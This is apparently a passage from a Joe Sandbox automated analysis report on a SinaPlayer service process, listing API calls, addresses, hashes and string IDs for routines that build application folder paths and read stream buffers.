                                                                                                                                                                                                     • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Policy$Concurrency@@ElementKey@2@@Policy@SchedulerValue@std::exception::exception$??2@ExceptionH_prolog3_catchThrowmallocmemcpy
                                                                                                                                                                                                    • String ID: tv[l
                                                                                                                                                                                                    • API String ID: 1089537546-2284738009
                                                                                                                                                                                                    • Opcode ID: b12211437349963379821e884bffe94ba372fda4b853a3c331940777ba9eaf5a
                                                                                                                                                                                                    • Instruction ID: 48db2408bdba585bb2d6d1bf8212c5f126665607bc2bbde34cc4e1e7aa7cc52f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b12211437349963379821e884bffe94ba372fda4b853a3c331940777ba9eaf5a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: BC21E571900208DBCF10DFE9CC81ADCBBA4AF95318F50461AE915ABB90DB34994ACBA1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?Get@PathService@@SA_NHPAVFilePath@base@@@Z.BASE(000003EF,?), ref: 00380018
                                                                                                                                                                                                    • ?Append@FilePath@base@@QBE?AV12@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.BASE(?,?), ref: 0038004E
                                                                                                                                                                                                    • ??4FilePath@base@@QAEAAV01@ABV01@@Z.BASE(00000000), ref: 00380062
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 00380074
                                                                                                                                                                                                      • Part of subcall function 003723E0: ??3@YAXPAX@Z.MSVCR120(?,00000000,0038B4CE,00000000), ref: 003723EB
                                                                                                                                                                                                    • ?PathExists@base@@YA_NABVFilePath@1@@Z.BASE(?), ref: 0038027F
                                                                                                                                                                                                    • ?CreateDirectoryW@base@@YA_NABVFilePath@1@@Z.BASE(?), ref: 00380290
                                                                                                                                                                                                    • ??4FilePath@base@@QAEAAV01@ABV01@@Z.BASE(?), ref: 003802A3
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 003802B5
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: File$Path@base@@$PathPath@1@@V01@V01@@$??3@Append@CreateDirectoryExists@base@@Get@Path@base@@@Service@@U?$char_traits@_V12@V?$allocator@_V?$basic_string@_W@2@@std@@@W@base@@W@std@@
                                                                                                                                                                                                    • String ID: $User Data
                                                                                                                                                                                                    • API String ID: 2074397066-3281480726
                                                                                                                                                                                                    • Opcode ID: a7286ee4222d44f02dfa2262d8f09901af5c1ff73f32529b675d8d3d6bc2e765
                                                                                                                                                                                                    • Instruction ID: 17866ef6f34397263cb6110ea2fa85664201a45fb20a4beef8ef88fc4af46079
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a7286ee4222d44f02dfa2262d8f09901af5c1ff73f32529b675d8d3d6bc2e765
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1F218031804248DFDF16EB94DC59AEDBBB8BF19318F14009AD846B7282DB755B4CCB21
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?Get@PathService@@SA_NHPAVFilePath@base@@@Z.BASE(000003F0,?), ref: 00380091
                                                                                                                                                                                                    • ?Append@FilePath@base@@QBE?AV12@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.BASE(?,?), ref: 003800C7
                                                                                                                                                                                                    • ??4FilePath@base@@QAEAAV01@ABV01@@Z.BASE(00000000), ref: 003800DB
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 003800ED
                                                                                                                                                                                                      • Part of subcall function 003723E0: ??3@YAXPAX@Z.MSVCR120(?,00000000,0038B4CE,00000000), ref: 003723EB
                                                                                                                                                                                                    • ?PathExists@base@@YA_NABVFilePath@1@@Z.BASE(?), ref: 0038027F
                                                                                                                                                                                                    • ?CreateDirectoryW@base@@YA_NABVFilePath@1@@Z.BASE(?), ref: 00380290
                                                                                                                                                                                                    • ??4FilePath@base@@QAEAAV01@ABV01@@Z.BASE(?), ref: 003802A3
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 003802B5
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: File$Path@base@@$PathPath@1@@V01@V01@@$??3@Append@CreateDirectoryExists@base@@Get@Path@base@@@Service@@U?$char_traits@_V12@V?$allocator@_V?$basic_string@_W@2@@std@@@W@base@@W@std@@
                                                                                                                                                                                                    • String ID: $Cache
                                                                                                                                                                                                    • API String ID: 2074397066-2286424636
                                                                                                                                                                                                    • Opcode ID: 51010f66987d6d531fae5a9ab94621c983de93c6a3e3fccb022438154637389e
                                                                                                                                                                                                    • Instruction ID: 17df95f6b19f4371520cb1ae36a8ae1e1d0315e3c11fa030635c055216c9e135
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 51010f66987d6d531fae5a9ab94621c983de93c6a3e3fccb022438154637389e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: EC21833180424C9FDF16EB94DC49AEDBB78BF19318F14009AD846B7282DB755B4DCB61
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?Get@PathService@@SA_NHPAVFilePath@base@@@Z.BASE(000003F1,?), ref: 0038010A
                                                                                                                                                                                                    • ?Append@FilePath@base@@QBE?AV12@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.BASE(?,?), ref: 00380140
                                                                                                                                                                                                    • ??4FilePath@base@@QAEAAV01@ABV01@@Z.BASE(00000000), ref: 00380154
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 00380166
                                                                                                                                                                                                      • Part of subcall function 003723E0: ??3@YAXPAX@Z.MSVCR120(?,00000000,0038B4CE,00000000), ref: 003723EB
                                                                                                                                                                                                    • ?PathExists@base@@YA_NABVFilePath@1@@Z.BASE(?), ref: 0038027F
                                                                                                                                                                                                    • ?CreateDirectoryW@base@@YA_NABVFilePath@1@@Z.BASE(?), ref: 00380290
                                                                                                                                                                                                    • ??4FilePath@base@@QAEAAV01@ABV01@@Z.BASE(?), ref: 003802A3
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 003802B5
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: File$Path@base@@$PathPath@1@@V01@V01@@$??3@Append@CreateDirectoryExists@base@@Get@Path@base@@@Service@@U?$char_traits@_V12@V?$allocator@_V?$basic_string@_W@2@@std@@@W@base@@W@std@@
                                                                                                                                                                                                    • String ID: $ChannelImg_30_30
                                                                                                                                                                                                    • API String ID: 2074397066-182828702
                                                                                                                                                                                                    • Opcode ID: 5f98b522f8c078a04622250066b2b5fc406cfd8b130f8a84f12ae907e70ba5a3
                                                                                                                                                                                                    • Instruction ID: baa85de5a04c943b082a105b4830dfcbb6eef08dd741f11a202e7f0dd31d1732
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5f98b522f8c078a04622250066b2b5fc406cfd8b130f8a84f12ae907e70ba5a3
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A121B33180420C9FDF16EB94DC59AEDBB78BF1A318F14049AD84AB7282DB715A4DCB21
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?Get@PathService@@SA_NHPAVFilePath@base@@@Z.BASE(000003F0,?), ref: 00380183
                                                                                                                                                                                                    • ?Append@FilePath@base@@QBE?AV12@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.BASE(?,?), ref: 003801B3
                                                                                                                                                                                                    • ??4FilePath@base@@QAEAAV01@ABV01@@Z.BASE(00000000), ref: 003801C7
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 003801D9
                                                                                                                                                                                                      • Part of subcall function 003723E0: ??3@YAXPAX@Z.MSVCR120(?,00000000,0038B4CE,00000000), ref: 003723EB
                                                                                                                                                                                                    • ?PathExists@base@@YA_NABVFilePath@1@@Z.BASE(?), ref: 0038027F
                                                                                                                                                                                                    • ?CreateDirectoryW@base@@YA_NABVFilePath@1@@Z.BASE(?), ref: 00380290
                                                                                                                                                                                                    • ??4FilePath@base@@QAEAAV01@ABV01@@Z.BASE(?), ref: 003802A3
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 003802B5
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: File$Path@base@@$PathPath@1@@V01@V01@@$??3@Append@CreateDirectoryExists@base@@Get@Path@base@@@Service@@U?$char_traits@_V12@V?$allocator@_V?$basic_string@_W@2@@std@@@W@base@@W@std@@
                                                                                                                                                                                                    • String ID: $Upgrade
                                                                                                                                                                                                    • API String ID: 2074397066-4235421785
                                                                                                                                                                                                    • Opcode ID: 43e8109d5e684a2dfb6186940a18eb8bb49f91edbcf290aefb5ddd088ad4a1b4
                                                                                                                                                                                                    • Instruction ID: 2a80527f39186d5ccbf36ea7a1b19d449c65842e211ac0049b0124cf1cd13aba
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 43e8109d5e684a2dfb6186940a18eb8bb49f91edbcf290aefb5ddd088ad4a1b4
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9721A43180420CDFDF16EB94DC49AEDBB78BF19318F14019AD846B7292DB759A4DCB21
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?Get@PathService@@SA_NHPAVFilePath@base@@@Z.BASE(0000006E,?), ref: 0037FF26
                                                                                                                                                                                                    • ?Append@FilePath@base@@QBE?AV12@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.BASE(?,?), ref: 0037FF5C
                                                                                                                                                                                                    • ??4FilePath@base@@QAEAAV01@ABV01@@Z.BASE(00000000), ref: 0037FF70
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 0037FF82
                                                                                                                                                                                                      • Part of subcall function 003723E0: ??3@YAXPAX@Z.MSVCR120(?,00000000,0038B4CE,00000000), ref: 003723EB
                                                                                                                                                                                                    • ?PathExists@base@@YA_NABVFilePath@1@@Z.BASE(?), ref: 0038027F
                                                                                                                                                                                                    • ?CreateDirectoryW@base@@YA_NABVFilePath@1@@Z.BASE(?), ref: 00380290
                                                                                                                                                                                                    • ??4FilePath@base@@QAEAAV01@ABV01@@Z.BASE(?), ref: 003802A3
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 003802B5
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: File$Path@base@@$PathPath@1@@V01@V01@@$??3@Append@CreateDirectoryExists@base@@Get@Path@base@@@Service@@U?$char_traits@_V12@V?$allocator@_V?$basic_string@_W@2@@std@@@W@base@@W@std@@
                                                                                                                                                                                                    • String ID: $Sina
                                                                                                                                                                                                    • API String ID: 2074397066-3713690197
                                                                                                                                                                                                    • Opcode ID: 7114db29dc7cfab125e6947484fc8e6477a8c1ba2393292b03030d9a7d2c6818
                                                                                                                                                                                                    • Instruction ID: 01183c6b4abd298ad54f9a76e27725259b045eb37eac959450901bacce703303
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7114db29dc7cfab125e6947484fc8e6477a8c1ba2393292b03030d9a7d2c6818
                                                                                                                                                                                                    • Instruction Fuzzy Hash: FB2180318042489FDF16EBA4DC49BEDBB78BF19318F14009AD84AB7282DB755A4DDB21
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?Get@PathService@@SA_NHPAVFilePath@base@@@Z.BASE(000003EE,?), ref: 0037FF9F
                                                                                                                                                                                                    • ?Append@FilePath@base@@QBE?AV12@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.BASE(?,?), ref: 0037FFD5
                                                                                                                                                                                                    • ??4FilePath@base@@QAEAAV01@ABV01@@Z.BASE(00000000), ref: 0037FFE9
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 0037FFFB
                                                                                                                                                                                                      • Part of subcall function 003723E0: ??3@YAXPAX@Z.MSVCR120(?,00000000,0038B4CE,00000000), ref: 003723EB
                                                                                                                                                                                                    • ?PathExists@base@@YA_NABVFilePath@1@@Z.BASE(?), ref: 0038027F
                                                                                                                                                                                                    • ?CreateDirectoryW@base@@YA_NABVFilePath@1@@Z.BASE(?), ref: 00380290
                                                                                                                                                                                                    • ??4FilePath@base@@QAEAAV01@ABV01@@Z.BASE(?), ref: 003802A3
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 003802B5
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: File$Path@base@@$PathPath@1@@V01@V01@@$??3@Append@CreateDirectoryExists@base@@Get@Path@base@@@Service@@U?$char_traits@_V12@V?$allocator@_V?$basic_string@_W@2@@std@@@W@base@@W@std@@
                                                                                                                                                                                                    • String ID: $SinaPlayer
                                                                                                                                                                                                    • API String ID: 2074397066-831897694
                                                                                                                                                                                                    • Opcode ID: 1afd5149bae70f4188c33be518bdf906bda26f0a8499186bf1fcc98e5af83044
                                                                                                                                                                                                    • Instruction ID: c0b25a36a53fb0634f0b3d8f3602303d3ecab45057085218f893c12c00fb19ab
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1afd5149bae70f4188c33be518bdf906bda26f0a8499186bf1fcc98e5af83044
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F221B0318042489FDF16EBA4DC49BEDBB78BF1A318F14009AD846B7282DB715A4CCB21
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?Get@PathService@@SA_NHPAVFilePath@base@@@Z.BASE(000003F0,?), ref: 00380206
                                                                                                                                                                                                    • ?Append@FilePath@base@@QBE?AV12@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.BASE(?,?), ref: 00380236
                                                                                                                                                                                                    • ??4FilePath@base@@QAEAAV01@ABV01@@Z.BASE(00000000), ref: 0038024A
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 0038025C
                                                                                                                                                                                                      • Part of subcall function 003723E0: ??3@YAXPAX@Z.MSVCR120(?,00000000,0038B4CE,00000000), ref: 003723EB
                                                                                                                                                                                                    • ?PathExists@base@@YA_NABVFilePath@1@@Z.BASE(?), ref: 0038027F
                                                                                                                                                                                                    • ?CreateDirectoryW@base@@YA_NABVFilePath@1@@Z.BASE(?), ref: 00380290
                                                                                                                                                                                                    • ??4FilePath@base@@QAEAAV01@ABV01@@Z.BASE(?), ref: 003802A3
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 003802B5
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: File$Path@base@@$PathPath@1@@V01@V01@@$??3@Append@CreateDirectoryExists@base@@Get@Path@base@@@Service@@U?$char_traits@_V12@V?$allocator@_V?$basic_string@_W@2@@std@@@W@base@@W@std@@
                                                                                                                                                                                                    • String ID: $Local State
                                                                                                                                                                                                    • API String ID: 2074397066-3454405924
                                                                                                                                                                                                    • Opcode ID: f9228654f6d6e961eb278a80195b279ca5a8458e27f81bbd997befbcb3e206b5
                                                                                                                                                                                                    • Instruction ID: e37d3d0099e9fa370367402708f3355bd3cdedcfdfa3b43db97ccf8e5fad3455
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f9228654f6d6e961eb278a80195b279ca5a8458e27f81bbd997befbcb3e206b5
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F621D43180424C9FDF16EBA4DC49AEDBB78BF19318F0400AAD846B7282DB755A4DCB21
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP120(8285FFAB), ref: 00392BBD
                                                                                                                                                                                                    • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP120 ref: 00392BD3
                                                                                                                                                                                                    • ?_Gninc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEPADXZ.MSVCP120 ref: 00392BDF
                                                                                                                                                                                                    • ?setg@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXPAD00@Z.MSVCP120(?,?,?), ref: 00392C11
                                                                                                                                                                                                    • fgetc.MSVCR120 ref: 00392C20
                                                                                                                                                                                                    • ungetc.MSVCR120 ref: 00392D6A
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: D@std@@@std@@U?$char_traits@$?gptr@?$basic_streambuf@$?setg@?$basic_streambuf@D00@Gninc@?$basic_streambuf@fgetcungetc
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1268163327-0
                                                                                                                                                                                                    • Opcode ID: 9cf258fbdbc56a7ca0fd56dd468560f195c0159ce5771e6f2d8cf54aa1c97e09
                                                                                                                                                                                                    • Instruction ID: 8f13b3091b54409a08763762031bcec5ae3292289a0d11926e9c44c34d223c2b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9cf258fbdbc56a7ca0fd56dd468560f195c0159ce5771e6f2d8cf54aa1c97e09
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 38517172A00519EFCF16DFA8C885AEEBBB8FF09321F140616E911B3590D731E954CBA1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP120 ref: 003759DD
                                                                                                                                                                                                    • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP120 ref: 003759E9
                                                                                                                                                                                                    • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP120 ref: 003759F6
                                                                                                                                                                                                    • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP120 ref: 00375A1F
                                                                                                                                                                                                    • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP120 ref: 00375A61
                                                                                                                                                                                                    • ?gbump@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXH@Z.MSVCP120(?), ref: 00375A71
                                                                                                                                                                                                    • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP120 ref: 00375A83
                                                                                                                                                                                                    • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP120 ref: 00375AA2
                                                                                                                                                                                                    • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP120 ref: 00375AD0
                                                                                                                                                                                                    • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP120 ref: 00375AFE
                                                                                                                                                                                                    • ?pbump@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXH@Z.MSVCP120(?), ref: 00375B0E
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: D@std@@@std@@U?$char_traits@$?pptr@?$basic_streambuf@$?gptr@?$basic_streambuf@$?gbump@?$basic_streambuf@?pbump@?$basic_streambuf@
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2796781305-0
                                                                                                                                                                                                    • Opcode ID: 3e531fb08948a289a09d789ac1ee902d5452506be6ec6c233a97c836905e9f7d
                                                                                                                                                                                                    • Instruction ID: 53b01ceb09df5e71723c297e91cd602ba263cd6aee9af5a1d27665a16715e16f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3e531fb08948a289a09d789ac1ee902d5452506be6ec6c233a97c836905e9f7d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1C515E757106048FCF6ACF28D99566977B9BF88300F0685A9EC0A9B361DB78EC40CB90
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP120 ref: 00375CB3
                                                                                                                                                                                                    • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP120 ref: 00375CCF
                                                                                                                                                                                                    • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP120 ref: 00375CDB
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ?gptr@?$basic_streambuf@D@std@@@std@@U?$char_traits@
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1832386714-0
                                                                                                                                                                                                    • Opcode ID: 8357150e8dc030518a2d70493fd5e4bc382718326bb9ced2311071b3f4921309
                                                                                                                                                                                                    • Instruction ID: 1f36ce54da44b4f7b400efc136353f47c347d11d38943535d2a72f1ac244c10d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8357150e8dc030518a2d70493fd5e4bc382718326bb9ced2311071b3f4921309
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A4213D713002008FCF669F38D9D812877B9BB493617555AAAD846CB2A5CB79EC45CB40
                                                                                                                                                                                                    APIs
